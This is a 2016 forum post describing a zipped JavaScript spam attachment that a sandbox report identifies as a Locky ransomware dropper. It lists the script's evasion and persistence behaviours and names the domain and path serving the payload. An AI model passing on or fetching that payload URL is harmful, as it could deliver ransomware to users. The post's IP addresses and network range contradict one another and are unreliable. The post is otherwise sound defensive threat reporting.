Do you have a question? Post it now! No Registration Necessary. Now with pictures!
- Virus Guy
May 7, 2016, 9:31 pm
rate this thread
direct-to-mx spam came from, but it's from a large mid-western US
Received: from DELL-PC ([xxx.yyy.232.155])
Attachment: TICKET-T(bunch of numbers).zip
I still say that Macro$haft should pull .zip file-handling /
decompression capability from Win-8/win-10, because (a) nobody
compresses files anymore (does windoze even have the native capability
to perform .zip compression?) and (b) it's bloody obvious that sending
these .js scripts (and many other forms of malware) as zip-compressed
email attachments is critical to the exploit chain of operation.
This script file:
- Performs some HTTP requests (buntrocks.com/09y8hb7v6y7g)
- attempted to delay the analysis task by a long amount of time.
(WScript.exe tried to sleep 1566864 seconds, actually delayed
analysis time by 0 seconds)
- Tries to unhook Windows functions monitored by Cuckoo
- Installs itself for autorun at Windows startup
"buntrocks.com" is (currently) resolving to 22.214.171.124
rDNS for 126.96.36.199 is boson.dnsprotect.com.
188.8.131.52 is assigned to:
NetRange: 184.108.40.206 - 220.127.116.11
Organization: Global Net Access, LLC (GNAL-2)
Address: 1100 White St SW
OrgTechName: GNAX ENGINEERING
The file 09y8hb7v6y7g was apparently analyzed at 7:32 pm thursday night.
It's ID's as Locky - ie Ransomware.
By the way, buntrocks.com still resolves to 18.104.22.168, and more than
48 hours is still serving up the locky payload:
- » Ransomware maker TeslaCrypt shuts down after releasing master key
- — Next thread in » Anti-Virus Software
- » How to get legit software updates through gauntlet of institutional / corporate anti-malw...
- — Previous thread in » Anti-Virus Software